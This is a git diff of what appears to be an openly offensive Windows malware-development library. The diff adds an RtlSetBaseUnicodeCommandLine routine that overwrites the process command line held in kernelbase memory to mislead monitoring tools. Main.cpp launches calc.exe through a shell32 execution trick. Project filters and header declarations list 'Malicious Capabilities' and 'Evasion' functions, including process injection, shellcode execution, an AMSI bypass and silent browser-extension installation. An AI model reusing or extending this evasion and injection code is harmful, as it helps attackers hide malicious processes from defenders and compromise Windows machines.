//////////////////////////////////////////////////////////////////////////
|
||||
|
||||
//MpfSceViaSymEnumSourceFiles((PBYTE)Buffer, dwSize);
|
||||
|
||||
//BOOL bFlag = AmsiBypassViaPatternScan(4288);
|
||||
|
||||
CreateProcessFromShell32ShellExecRunDllW(L"C:\\Windows\\System32\\calc.exe");
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
}
|
||||
|
||||
Sleep(1);
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "StringManipulation.h"
|
||||
|
||||
VOID RtlInitAnsiString(_Inout_ PANSI_STRING DestinationString, _In_ PCSTR SourceString)
|
||||
{
|
||||
SIZE_T Size;
|
||||
|
||||
if (SourceString)
|
||||
{
|
||||
Size = StringLengthA(SourceString);
|
||||
if (Size > (65535 - sizeof(CHAR))) Size = 65535 - sizeof(CHAR);
|
||||
DestinationString->Length = (USHORT)Size;
|
||||
DestinationString->MaximumLength = (USHORT)Size + sizeof(CHAR);
|
||||
}
|
||||
else
|
||||
{
|
||||
DestinationString->Length = 0;
|
||||
DestinationString->MaximumLength = 0;
|
||||
}
|
||||
|
||||
DestinationString->Buffer = (PCHAR)SourceString;
|
||||
}
|
|
@ -0,0 +1,108 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL RtlSetBaseUnicodeCommandLine(PWCHAR CommandLinePayload)
|
||||
{
|
||||
PIMAGE_DOS_HEADER Dos = NULL;
|
||||
PIMAGE_NT_HEADERS Nt = NULL;
|
||||
PIMAGE_FILE_HEADER File = NULL;
|
||||
PIMAGE_OPTIONAL_HEADER Optional = NULL;
|
||||
HMODULE hKernelBase = NULL;
|
||||
PBYTE BaseAddress = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
PIMAGE_SECTION_HEADER SectionHeaderArray = NULL;
|
||||
PULONG_PTR DataSegment = ERROR_SUCCESS;
|
||||
DWORD NumberOfPointers = ERROR_SUCCESS;
|
||||
PWSTR CommandLineString = NULL;
|
||||
PSTR CommandLineStringA = NULL;
|
||||
PUNICODE_STRING CommandLineUnicodeString = NULL;
|
||||
PANSI_STRING CommandLineAnsiString = NULL;
|
||||
PPEB Peb = GetPeb();
|
||||
PLDR_MODULE Module = NULL;
|
||||
|
||||
hKernelBase = TryLoadDllMultiMethodW((PWCHAR)L"kernelbase.dll");
|
||||
if (!hKernelBase)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
BaseAddress = (PBYTE)hKernelBase;
|
||||
|
||||
if (!RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &BaseAddress))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
SectionHeaderArray = (PIMAGE_SECTION_HEADER)(ULONGLONG(Nt) + sizeof(IMAGE_NT_HEADERS));
|
||||
for (DWORD dwX = 0; dwX < File->NumberOfSections; dwX++)
|
||||
{
|
||||
if (StringCompareA((PCHAR)SectionHeaderArray[dwX].Name, ".data") == ERROR_SUCCESS)
|
||||
{
|
||||
DataSegment = (PULONG_PTR)(BaseAddress + SectionHeaderArray[dwX].VirtualAddress);
|
||||
NumberOfPointers = SectionHeaderArray[dwX].Misc.VirtualSize / sizeof(ULONG_PTR);
|
||||
bFlag = TRUE;
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if (!bFlag)
|
||||
goto EXIT_ROUTINE;
|
||||
else
|
||||
bFlag = FALSE;
|
||||
|
||||
CommandLineString = GetCommandLineW();
|
||||
if (CommandLineString == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
for (DWORD dwX = 0; dwX < NumberOfPointers; dwX++)
|
||||
{
|
||||
CommandLineUnicodeString = (PUNICODE_STRING)&DataSegment[dwX];
|
||||
__try
|
||||
{
|
||||
if (StringCompareW(CommandLineUnicodeString->Buffer, CommandLineString) == 0)
|
||||
{
|
||||
RtlInitUnicodeString(CommandLineUnicodeString, CommandLinePayload);
|
||||
break;
|
||||
}
|
||||
}
|
||||
__except (EXCEPTION_EXECUTE_HANDLER) { continue; }
|
||||
}
|
||||
|
||||
CommandLineStringA = GetCommandLineA();
|
||||
if (CommandLineStringA == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
for (DWORD dwX = 0; dwX < NumberOfPointers; dwX++)
|
||||
{
|
||||
CommandLineAnsiString = (PANSI_STRING)&DataSegment[dwX];
|
||||
__try
|
||||
{
|
||||
if (StringCompareA(CommandLineAnsiString->Buffer, CommandLineStringA) == 0)
|
||||
{
|
||||
CHAR ccBuffer[MAX_PATH] = { 0 };
|
||||
ANSI_STRING AnsiString = { 0 };
|
||||
|
||||
if (WCharStringToCharString(ccBuffer, CommandLinePayload, StringLengthW(CommandLinePayload)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
RtlInitAnsiString(&AnsiString, ccBuffer);
|
||||
|
||||
if (CopyMemoryEx(&DataSegment[dwX], &AnsiString, sizeof(ANSI_STRING)) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
break;
|
||||
}
|
||||
}
|
||||
__except (EXCEPTION_EXECUTE_HANDLER) { continue; }
|
||||
}
|
||||
|
||||
Module = (PLDR_MODULE)((PBYTE)Peb->LoaderData->InMemoryOrderModuleList.Flink - 16);
|
||||
|
||||
for (DWORD dwX = 0; TRUE; dwX++)
|
||||
{
|
||||
Module = (PLDR_MODULE)((PBYTE)Module->InMemoryOrderModuleList.Flink - 16);
|
||||
if (Module->BaseDllName.Buffer == NULL)
|
||||
break;
|
||||
}
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -30,6 +30,7 @@ VOID CharArrayToByteArrayA(_In_ PCHAR Char, _Inout_ PBYTE Byte, _In_ DWORD Lengt
|
|||
VOID CharArrayToByteArrayW(_In_ PWCHAR Char, _Inout_ PBYTE Byte, _In_ DWORD Length);
|
||||
VOID RtlInitUnicodeString(_Inout_ PUNICODE_STRING DestinationString, _In_ PCWSTR SourceString);
|
||||
VOID RtlInitEmptyUnicodeString(_Inout_ PUNICODE_STRING UnicodeString);
|
||||
VOID RtlInitAnsiString(_Inout_ PANSI_STRING DestinationString, _In_ PCSTR SourceString);
|
||||
SIZE_T CharStringToWCharString(_Inout_ PWCHAR Destination, _In_ PCHAR Source, _In_ SIZE_T MaximumAllowed);
|
||||
SIZE_T WCharStringToCharString(_Inout_ PCHAR Destination, _In_ PWCHAR Source, _In_ SIZE_T MaximumAllowed);
|
||||
VOID ByteArrayToCharArrayA(_Inout_ PCHAR Destination, _In_ PBYTE Source, _In_ DWORD Length);
|
||||
|
|
|
@ -157,13 +157,17 @@
|
|||
<ClCompile Include="CreateProcessFromIHxInteractiveUser.cpp" />
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab.cpp" />
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab2.cpp" />
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab3.cpp" />
|
||||
<ClCompile Include="CreateProcessFromINFSetupCommand.cpp" />
|
||||
<ClCompile Include="CreateProcessFromIShellDispatchInvoke.cpp" />
|
||||
<ClCompile Include="CreateProcessFromMSHTML.cpp" />
|
||||
<ClCompile Include="CreateProcessFromPcwUtil.cpp" />
|
||||
<ClCompile Include="CreateProcessFromShdocVwOpenUrl.cpp" />
|
||||
<ClCompile Include="CreateProcessFromShell32ShellExecRunDll.cpp" />
|
||||
<ClCompile Include="CreateProcessFromShell32ShellExecRun.cpp" />
|
||||
<ClCompile Include="CreateProcessFromShellExecuteInExplorerProcess.cpp" />
|
||||
<ClCompile Include="CreateProcessFromUrlFileProtocolHandler.cpp" />
|
||||
<ClCompile Include="CreateProcessFromUrlOpenUrl.cpp" />
|
||||
<ClCompile Include="CreateProcessFromWmiWin32_Process.cpp" />
|
||||
<ClCompile Include="CreateProcessFromZipfldrRouteCall.cpp" />
|
||||
<ClCompile Include="CreateProcessViaNtCreateUserProcess.cpp" />
|
||||
<ClCompile Include="CreateProcessWithCfGuard.cpp" />
|
||||
<ClCompile Include="CreatePseudoRandomInteger.cpp" />
|
||||
|
@ -172,17 +176,21 @@
|
|||
<ClCompile Include="CreateThreadAndWaitForCompletion.cpp" />
|
||||
<ClCompile Include="CreateWindowsObjectPath.cpp" />
|
||||
<ClCompile Include="DelayedExecutionExecuteOnDisplayOff.cpp" />
|
||||
<ClCompile Include="DeleteDirectoryAndSubDataViaDelNode.cpp" />
|
||||
<ClCompile Include="DeleteFileWithCreateFileFlag.cpp" />
|
||||
<ClCompile Include="DnsGetDomainNameIPv4AddressAsString.cpp" />
|
||||
<ClCompile Include="DnsGetDomainNameIPv4AddressUnsignedLong.cpp" />
|
||||
<ClCompile Include="ExampleOfUsageOfHardwareBreakpointHookingEngine.cpp" />
|
||||
<ClCompile Include="ExceptHandlerCallbackRoutine.cpp" />
|
||||
<ClCompile Include="ExtractFilesFromCabIntoTarget.cpp" />
|
||||
<ClCompile Include="Ex_GetHandleOnDeviceHttpCommunication.cpp" />
|
||||
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp" />
|
||||
<ClCompile Include="GetCurrentProcessNoForward.cpp" />
|
||||
<ClCompile Include="GetCurrentThreadNoForward.cpp" />
|
||||
<ClCompile Include="GetPeSectionSizeInBytes.cpp" />
|
||||
<ClCompile Include="IeCreateFile.cpp" />
|
||||
<ClCompile Include="IsPeSection.cpp" />
|
||||
<ClCompile Include="IsProcessRunningAsAdmin2.cpp" />
|
||||
<ClCompile Include="LzMaximumCompressBuffer.cpp" />
|
||||
<ClCompile Include="LzMaximumDecompressBuffer.cpp" />
|
||||
<ClCompile Include="LzStandardCompressBuffer.cpp" />
|
||||
|
@ -259,7 +267,6 @@
|
|||
<ClCompile Include="LdrLoadGetProcedureAddress.cpp" />
|
||||
<ClCompile Include="MemoryFindMemory.cpp" />
|
||||
<ClCompile Include="MpfExtractMaliciousPayloadFromZipFileNoPassword.cpp" />
|
||||
<ClCompile Include="MpfLolExecuteRemoteBinaryByAppInstaller.cpp" />
|
||||
<ClCompile Include="Main.cpp" />
|
||||
<ClCompile Include="ManualResourceDataFetching.cpp" />
|
||||
<ClCompile Include="MasqueradePebAsExplorer.cpp" />
|
||||
|
@ -322,6 +329,8 @@
|
|||
<ClCompile Include="ReadDataFromPeSection.cpp" />
|
||||
<ClCompile Include="RemoveDescriptorEntry.cpp" />
|
||||
<ClCompile Include="RemoveRegisterDllNotification.cpp" />
|
||||
<ClCompile Include="RtlInitAnsiString.cpp" />
|
||||
<ClCompile Include="RtlSetBaseUnicodeCommandLine.cpp" />
|
||||
<ClCompile Include="SetHardwareBreakpoint.cpp" />
|
||||
<ClCompile Include="ShutdownHardwareBreakpointEngine.cpp" />
|
||||
<ClCompile Include="SleepObfuscationViaVirtualProtect.cpp" />
|
||||
|
@ -375,6 +384,9 @@
|
|||
<ItemGroup>
|
||||
<None Include="..\README.md" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Text Include="Notes.txt" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
|
|
|
@ -58,9 +58,6 @@
|
|||
<Filter Include="Source Files\Windows API Helper Functions\Network Connectivity\Network Data Conversions">
|
||||
<UniqueIdentifier>{6be9adc7-8493-44a7-abce-3ec818469f70}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Source Files\Windows API Helper Functions\Malicious Capabilities\Lolbins">
|
||||
<UniqueIdentifier>{b688b3fc-f662-4634-b690-f200a79aee37}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Source Files\Rad Hardware Breakpoint Hooking Engine">
|
||||
<UniqueIdentifier>{148b86cd-abe4-43c3-a827-d89b58910722}</UniqueIdentifier>
|
||||
</Filter>
|
||||
|
@ -91,6 +88,12 @@
|
|||
<Filter Include="Source Files\Windows API Helper Functions\Cryptography Related\Compression\Xpress Huff">
|
||||
<UniqueIdentifier>{28a8f2b1-755e-465f-b650-13a6f1c191c3}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Source Files\Windows API Helper Functions\Process Creation">
|
||||
<UniqueIdentifier>{97f12dfe-6de4-480c-834c-ea10483eea2d}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Source Files\Windows API Helper Functions\File Handling">
|
||||
<UniqueIdentifier>{b1bb1e2e-db48-4d6e-91a7-213c6e47a46a}</UniqueIdentifier>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="Main.cpp">
|
||||
|
@ -99,9 +102,6 @@
|
|||
<ClCompile Include="StringCopy.cpp">
|
||||
<Filter>Source Files\String Manipulation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CaplockString.cpp">
|
||||
<Filter>Source Files\String Manipulation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CopyMemoryEx.cpp">
|
||||
<Filter>Source Files\String Manipulation</Filter>
|
||||
</ClCompile>
|
||||
|
@ -249,9 +249,6 @@
|
|||
<ClCompile Include="CreateWindowsObjectPath.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="DeleteFileWithCreateFileFlag.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetCurrentDirectoryFromUserProcessParameters.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
|
@ -306,15 +303,6 @@
|
|||
<ClCompile Include="MpfComModifyShortcutTarget.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessWithCfGuard.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromIHxInteractiveUser.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromIHxHelpPaneServer.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="HashFileByMsiFileHashTable.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Cryptography Related</Filter>
|
||||
</ClCompile>
|
||||
|
@ -339,24 +327,12 @@
|
|||
<ClCompile Include="IsDebuggerPresentEx.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Antidebug</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateFileFromDsCopyFromSharedFile.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="DelayedExecutionExecuteOnDisplayOff.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateMd5HashFromFilePath.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Cryptography Related</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromShellExecuteInExplorerProcess.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromIShellDispatchInvoke.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessViaNtCreateUserProcess.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetOsMajorVersionFromPeb.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
|
||||
</ClCompile>
|
||||
|
@ -423,9 +399,6 @@
|
|||
<ClCompile Include="ShlwapiWCharStringToCharString.cpp">
|
||||
<Filter>Source Files\String Manipulation\String Conversion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfExecutePeBinaryInMemoryFromByteArray.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="ManualResourceDataFetching.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
|
@ -468,12 +441,6 @@
|
|||
<ClCompile Include="IsRegistryKeyValid.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfLolExecuteRemoteBinaryByAppInstaller.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Lolbins</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="HashStringMurmur.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Cryptography Related\String Hashing</Filter>
|
||||
</ClCompile>
|
||||
|
@ -540,12 +507,6 @@
|
|||
<ClCompile Include="CreatePseudoRandomIntegerFromNtdll.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Cryptography Related</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessByWindowsRHotKey.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessByWindowsRHotKeyEx.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfProcessInjectionViaProcessReflection.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
|
||||
</ClCompile>
|
||||
|
@ -762,38 +723,107 @@
|
|||
<ClCompile Include="MpfSceViaSymEnumSourceFiles.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CopyFileViaSetupCopyFile.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromINFSetupCommand.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromPcwUtil.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetCurrentProcessNoForward.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetCurrentThreadNoForward.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab2.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
<ClCompile Include="CreateProcessFromUrlOpenUrl.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromIeFrameOpenUrl.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
<ClCompile Include="CreateProcessWithCfGuard.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab3.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
<ClCompile Include="CreateProcessViaNtCreateUserProcess.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromZipfldrRouteCall.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromShellExecuteInExplorerProcess.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromShell32ShellExecRun.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromShdocVwOpenUrl.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromUrlFileProtocolHandler.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromPcwUtil.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromIShellDispatchInvoke.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromINFSetupCommand.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab2.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromIHxInteractiveUser.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromIeFrameOpenUrl.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromIHxHelpPaneServer.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessByWindowsRHotKeyEx.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessByWindowsRHotKey.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateFileFromDsCopyFromSharedFile.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\File Handling</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CopyFileViaSetupCopyFile.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\File Handling</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="DeleteFileWithCreateFileFlag.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\File Handling</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfExecutePeBinaryInMemoryFromByteArray.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="DeleteDirectoryAndSubDataViaDelNode.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\File Handling</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="IsProcessRunningAsAdmin2.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="ExtractFilesFromCabIntoTarget.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Cryptography Related</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="IeCreateFile.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\File Handling</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CaplockString.cpp">
|
||||
<Filter>Source Files\String Manipulation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="RtlInitAnsiString.cpp">
|
||||
<Filter>Source Files\String Manipulation\Windows Unicode Structure</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromMSHTML.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="RtlSetBaseUnicodeCommandLine.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromShell32ShellExecRunDll.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
<ClCompile Include="CreateProcessFromWmiWin32_Process.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
|
@ -813,4 +843,7 @@
|
|||
<ItemGroup>
|
||||
<None Include="..\README.md" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Text Include="Notes.txt" />
|
||||
</ItemGroup>
|
||||
</Project>
|
|
@ -1,4 +1,7 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<PropertyGroup />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LocalDebuggerCommandArguments>javascript:alert('hello');</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
</Project>
|
|
@ -22,9 +22,9 @@
|
|||
#include <resapi.h>
|
||||
#include <amsi.h>
|
||||
#include <SetupAPI.h>
|
||||
#include <WbemCli.h>
|
||||
|
||||
|
||||
|
||||
#pragma comment(lib, "wbemuuid.lib")
|
||||
#pragma comment(lib, "Dnsapi.lib")
|
||||
#pragma comment(lib, "Iphlpapi.lib")
|
||||
#pragma comment(lib, "Crypt32.lib")
|
||||
|
@ -272,8 +272,6 @@ DWORD MpfComMonitorChromeSessionOnce(VOID);
|
|||
DWORD MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc(_In_ PBYTE BinaryImage);
|
||||
BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginW(_In_ PWCHAR ExtensionIdentifier);
|
||||
BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginA(_In_ PCHAR ExtensionIdentifier);
|
||||
BOOL MpfLolExecuteRemoteBinaryByAppInstallerW(_In_ PWCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
|
||||
BOOL MpfLolExecuteRemoteBinaryByAppInstallerA(_In_ PCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
|
||||
BOOL MpfProcessInjectionViaProcessReflection(_In_ PBYTE Shellcode, _In_ DWORD dwSizeOfShellcodeInBytes, _In_ DWORD TargetPid);
|
||||
BOOL MpfExtractMaliciousPayloadFromZipFileNoPasswordW(_In_ PWCHAR FullPathToZip, _In_ PWCHAR FullPathToExtractionDirectory);
|
||||
BOOL MpfExtractMaliciousPayloadFromZipFileNoPasswordA(_In_ PCHAR FullPathToZip, _In_ PCHAR FullPathToExtractionDirectory);
|
||||
|
@ -330,35 +328,35 @@ BOOL MpfSceViaSymEnumSourceFiles(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInByt
|
|||
/*******************************************
|
||||
EVASION
|
||||
*******************************************/
|
||||
BOOL CreateProcessWithCfGuardW(_Inout_ PPROCESS_INFORMATION Pi, _In_ PWCHAR Path);
|
||||
BOOL CreateProcessWithCfGuardA(_Inout_ PPROCESS_INFORMATION Pi, _In_ PCHAR Path);
|
||||
HRESULT CreateProcessFromIHxInteractiveUserW(_In_ PWCHAR UriFile);
|
||||
HRESULT CreateProcessFromIHxInteractiveUserA(_In_ PCHAR UriFile);
|
||||
HRESULT CreateProcessFromIHxHelpPaneServerW(_In_ PWCHAR UriFile);
|
||||
HRESULT CreateProcessFromIHxHelpPaneServerA(_In_ PCHAR UriFile);
|
||||
BOOL MasqueradePebAsExplorer(VOID);
|
||||
BOOL CreateFileFromDsCopyFromSharedFileW(_In_ PWCHAR NewFileName, _In_ PWCHAR FileToClone);
|
||||
BOOL CreateFileFromDsCopyFromSharedFileA(_In_ PCHAR NewFileName, _In_ PCHAR FileToClone);
|
||||
BOOL DelayedExecutionExecuteOnDisplayOff(VOID);
|
||||
DWORD CreateProcessFromShellExecuteInExplorerProcessW(_In_ PWCHAR BinaryPath);
|
||||
DWORD CreateProcessFromShellExecuteInExplorerProcessA(_In_ PCHAR BinaryPath);
|
||||
DWORD CreateProcessFromIShellDispatchInvokeW(_In_ PWCHAR BinaryPath);
|
||||
DWORD CreateProcessFromIShellDispatchInvokeA(_In_ PCHAR BinaryPath);
|
||||
DWORD CreateProcessViaNtCreateUserProcessW(PWCHAR FullBinaryPath);
|
||||
DWORD CreateProcessViaNtCreateUserProcessA(PCHAR FullBinaryPath);
